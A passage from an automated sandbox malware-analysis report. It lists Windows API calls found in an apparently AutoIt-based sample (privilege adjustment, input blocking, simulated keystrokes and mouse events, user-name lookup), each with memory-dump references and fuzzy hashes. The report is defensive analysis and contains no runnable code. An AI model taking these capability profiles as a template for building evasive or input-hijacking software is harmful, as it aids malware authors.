                                                                                                                                                                                                                                                                                      • Part of subcall function 00B0014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00B009D8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B0014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00B009F5
                                                                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B4205A
                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B42087
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B42097
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 577356006-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8fe837bbe688020a990dfa4974379bdebf4062642fa4fcd5b39a104b0798745c
                                                                                                                                                                                                                                                                                    • Instruction ID: 23d07b7eed740dc99b4b34cee0a591fd0eedbd3e27bf0e5caff8f9fd31190635
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fe837bbe688020a990dfa4974379bdebf4062642fa4fcd5b39a104b0798745c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05119DB1414205AFD718AF54EC86E6ABBF8EF44750B20855EF04667291DB70AC41DA24
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00B0502E,?,00BA98D8,0000000C,00B05185,?,00000002,00000000), ref: 00B05079
                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00B0502E,?,00BA98D8,0000000C,00B05185,?,00000002,00000000), ref: 00B05080
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00B05092
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c87a44b8f87bf16526c336a3975651bb0224fef428a5f5c1cb0bd4bcf8767e73
                                                                                                                                                                                                                                                                                    • Instruction ID: 4a43c6a45618f05ec1adc8947525b95cd2ee3d9a2a913051348f7d92c87f04af
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c87a44b8f87bf16526c336a3975651bb0224fef428a5f5c1cb0bd4bcf8767e73
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBE0B631000548AFCF216F64DD09E993FB9EF50785F514054F84A9B961EB36DD82CED4
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00B3E664
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: NameUser
                                                                                                                                                                                                                                                                                    • String ID: X64
                                                                                                                                                                                                                                                                                    • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                    • Opcode ID: 64430f48358028b905527a9b4628f0814e316b3bd666f04f162d3dc7e944a292
                                                                                                                                                                                                                                                                                    • Instruction ID: 686d77360d89bd328ef8a3d43b3aeb87fbea1fdf32a8186a10085e618c4a16bc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64430f48358028b905527a9b4628f0814e316b3bd666f04f162d3dc7e944a292
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBD0C9B480111DEACF90CB90ECC8ED973BCBB04304F100696F106E2040DB30A5488B10
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00B652EE,?,?,00000035,?), ref: 00B54229
                                                                                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00B652EE,?,?,00000035,?), ref: 00B54239
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ce218fec925037103e52a3f2a27e1ca199b9ae8cc8b42c30f492495495181b35
                                                                                                                                                                                                                                                                                    • Instruction ID: e5b4822e88b8624134860d2af6eda0fda2b99d8868e658db9579b93de32d548d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce218fec925037103e52a3f2a27e1ca199b9ae8cc8b42c30f492495495181b35
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEF0E5307102256AE720176AAC4DFEB76BEEFC5761F0001B5F909E3181DA709984C6B0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B4BC24
                                                                                                                                                                                                                                                                                    • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00B4BC37
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e2722272a02cd8950cf783274445c6b3402b1dabc8d04ee8ea120301b0d1c2f2
                                                                                                                                                                                                                                                                                    • Instruction ID: 1b772c950f9c3db5457668620472d82cf7a6f322e8ef31f544afdad8be72bbbd
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2722272a02cd8950cf783274445c6b3402b1dabc8d04ee8ea120301b0d1c2f2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5F06D7180424DABDB059FA4C845BBE7BB0FF04309F008049F955A6192D779C601DF94
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B41B48), ref: 00B41A20
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00B41B48), ref: 00B41A35
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7dfdfdf613628e83e71f481edfad05b1b9b4502011b2e36e03c524234071998f
                                                                                                                                                                                                                                                                                    • Instruction ID: 1d9f959389baec5940199a7cd9227fa7adb758ff9cbad855f8174ce4cabf106b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7dfdfdf613628e83e71f481edfad05b1b9b4502011b2e36e03c524234071998f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11E01A72014611AEE7252B10FC05F727BE9FF04350F14885DF4A6914B0DA626C90DB14
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • BlockInput.USER32(00000001), ref: 00B5F51A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: BlockInput
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                    • Opcode ID: fbb073cad658efc220d4bdce629368f11a19975ace5d1e54d25d0fd62b3d05d1
                                                                                                                                                                                                                                                                                    • Instruction ID: 833195e4b8b53f873f22cada04ff841d9028bf8efaab5d2028037dd48936ea00
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbb073cad658efc220d4bdce629368f11a19975ace5d1e54d25d0fd62b3d05d1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3E048322002055FC710DF6AE444E96F7E8EFA4761F008465FC49C7351DA70F9458B90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00B4ECC7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: mouse_event
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2434400541-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ceb477b6eaec1dec4821e599ec251ea3b8448efc07b979b4c69b25c78dd06c44
                                                                                                                                                                                                                                                                                    • Instruction ID: ce48ad6b772498343a90618780c26254f74fe1569b62bc4033bdf6ca892a11f6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ceb477b6eaec1dec4821e599ec251ea3b8448efc07b979b4c69b25c78dd06c44
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FED05EB61942003DE91D0B38AEEFB762989F701741F8806C9F222D56DBE5D1DB80B021
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00B0075E), ref: 00B00D4A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8a3805e625565050b5ea944bae71d1122e18a75fe3e1cab71929f5291d988a68
                                                                                                                                                                                                                                                                                    • Instruction ID: 892e201131c97a2207e12697a548576ec6fc7c5d2979f502ae8e617a680c0c21
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a3805e625565050b5ea944bae71d1122e18a75fe3e1cab71929f5291d988a68
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B6358D
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B635A0
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00B635AF
                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00B635CA
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00B635D1
                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00B63700
                                                                                                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00B6370E
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B63755
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00B63761
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B6379D
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B637BF
                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B637D2
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B637DD
                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B637E6
                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B637F5
                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B637FE
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B63805
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00B63810
                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B63822
                                                                                                                                                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B80C04,00000000), ref: 00B63838
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00B63848
                                                                                                                                                                                                                                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00B6386E
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00B6388D
                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B638AF
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B63A9C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                    • Opcode ID: c602520cbae7b86a20008a52a6db4d4ded58d0cee2167bb4371f615ee95950a9
                                                                                                                                                                                                                                                                                    • Instruction ID: a170baeb7a0cde0f1c03829ba718deed7c15ac267526e1a00cdca49e4c3d1b98
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c602520cbae7b86a20008a52a6db4d4ded58d0cee2167bb4371f615ee95950a9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9024972900205AFDB14DF65CD89EAE7BF9EF48750F048158F919AB2A1CB74EE41CB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00B77B67
                                                                                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00B77B98
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00B77BA4
                                                                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00B77BBE
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00B77BCD
                                                                                                                                                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00B77BF8
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 00B77C00
                                                                                                                                                                                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00B77C07
                                                                                                                                                                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 00B77C16
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B77C1D
                                                                                                                                                                                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00B77C68
                                                                                                                                                                                                                                                                                    • FillRect.USER32(?,?,?), ref: 00B77C9A
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B77CBC
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B77E22: GetSysColor.USER32(00000012), ref: 00B77E5B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B77E22: SetTextColor.GDI32(?,00B77B2D), ref: 00B77E5F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B77E22: GetSysColorBrush.USER32(0000000F), ref: 00B77E75
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B77E22: GetSysColor.USER32(0000000F), ref: 00B77E80
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B77E22: GetSysColor.USER32(00000011), ref: 00B77E9D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B77E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B77EAB
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B77E22: SelectObject.GDI32(?,00000000), ref: 00B77EBC
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B77E22: SetBkColor.GDI32(?,?), ref: 00B77EC5
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B77E22: SelectObject.GDI32(?,?), ref: 00B77ED2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B77E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00B77EF1
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B77E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B77F08
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B77E22: GetWindowLongW.USER32(?,000000F0), ref: 00B77F15
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2f5ae56e71a1410b44ba93a8ef9829aafe01d12af90081d485a4e4b9e47b81de
                                                                                                                                                                                                                                                                                    • Instruction ID: 013ca7b34afd91763716e66515016e33f36512a9c47f12f1d320f8473fd833f4
